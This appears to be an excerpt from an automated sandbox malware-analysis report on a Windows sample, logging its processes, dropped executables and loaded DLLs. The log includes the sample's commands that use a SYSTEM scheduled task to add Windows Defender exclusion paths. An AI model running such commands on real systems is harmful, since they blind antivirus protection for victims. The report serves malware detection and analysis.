Source: C:\Program Files (x86)\b3aEb0H\1y6U0V.exe	Command line argument: tbcore3.dll	43_2_00951000
Source: C:\Program Files (x86)\b3aEb0H\1y6U0V.exe	Command line argument: tbcore3U.dll	43_2_00951000
Source: C:\Program Files (x86)\b3aEb0H\1y6U0V.exe	Command line argument: tbcore3U.dll	43_2_00951000

Source: 287438657364-7643738421.08.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Documents\lOXFJk.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 287438657364-7643738421.08.exe

Virustotal: Detection: 11%

Source: vhZp0W.exe	String found in binary or memory: <Repetition> <Interval>PT1M</Interval> <StopAtDurationEnd>false</StopAtDurationEnd> </Repetition> <Sta
Source: vhZp0W.exe	String found in binary or memory: <Repetition> <Interval>PT1M</Interval> <StopAtDurationEnd>false</StopAtDurationEnd> </Repetition> <Sta
Source: vhZp0W.exe	String found in binary or memory: tartIfOnBatteries> <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries> <AllowHardTerminate>false</AllowHardTerminate>
Source: vhZp0W.exe	String found in binary or memory: tartIfOnBatteries> <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries> <AllowHardTerminate>false</AllowHardTerminate>
Source: vhZp0W.exe	String found in binary or memory: <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </IdleSettings> <AllowStartOnDemand>t
Source: vhZp0W.exe	String found in binary or memory: <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </IdleSettings> <AllowStartOnDemand>t

Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe

File read: C:\Users\user\Desktop\287438657364-7643738421.08.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\287438657364-7643738421.08.exe "C:\Users\user\Desktop\287438657364-7643738421.08.exe"
Source: unknown	Process created: C:\Users\user\Documents\lOXFJk.exe C:\Users\user\Documents\lOXFJk.exe
Source: unknown	Process created: C:\Users\user\Documents\lOXFJk.exe C:\Users\user\Documents\lOXFJk.exe
Source: C:\Users\user\Documents\lOXFJk.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
Source: C:\Users\user\Documents\lOXFJk.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
Source: C:\Users\user\Documents\lOXFJk.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
Source: C:\Users\user\Documents\lOXFJk.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
Source: C:\Users\user\Documents\lOXFJk.exe	Process created: C:\Program Files (x86)\vhZp0W\vhZp0W.exe "C:\Program Files (x86)\vhZp0W\vhZp0W.exe"
Source: unknown	Process created: C:\Program Files (x86)\vhZp0W\vhZp0W.exe "C:\Program Files (x86)\vhZp0W\vhZp0W.exe"
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c echo.>c:\xxxx.ini
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Program Files (x86)\b3aEb0H\1y6U0V.exe "C:\Program Files (x86)\b3aEb0H\1y6U0V.exe"
Source: unknown	Process created: C:\Program Files (x86)\b3aEb0H\1y6U0V.exe "C:\Program Files (x86)\b3aEb0H\1y6U0V.exe"
Source: unknown	Process created: C:\Program Files (x86)\vhZp0W\vhZp0W.exe "C:\Program Files (x86)\vhZp0W\vhZp0W.exe"
Source: unknown	Process created: C:\Program Files (x86)\vhZp0W\vhZp0W.exe "C:\Program Files (x86)\vhZp0W\vhZp0W.exe"
Source: unknown	Process created: C:\Program Files (x86)\b3aEb0H\1y6U0V.exe "C:\Program Files (x86)\b3aEb0H\1y6U0V.exe"
Source: C:\Users\user\Documents\lOXFJk.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	Process created: C:\Program Files (x86)\vhZp0W\vhZp0W.exe "C:\Program Files (x86)\vhZp0W\vhZp0W.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c echo.>c:\xxxx.ini	Jump to behavior

Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe	Section loaded: pid.dll	Jump to behavior
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe	Section loaded: hid.dll	Jump to behavior
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	Section loaded: vselog.dll	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	Section loaded: vselog.dll	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	Section loaded: twext.dll	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	Section loaded: cscui.dll	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	Section loaded: workfoldersshell.dll	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	Section loaded: starttiledata.dll	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	Section loaded: usermgrproxy.dll	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	Section loaded: acppage.dll	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	Section loaded: aepic.dll	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
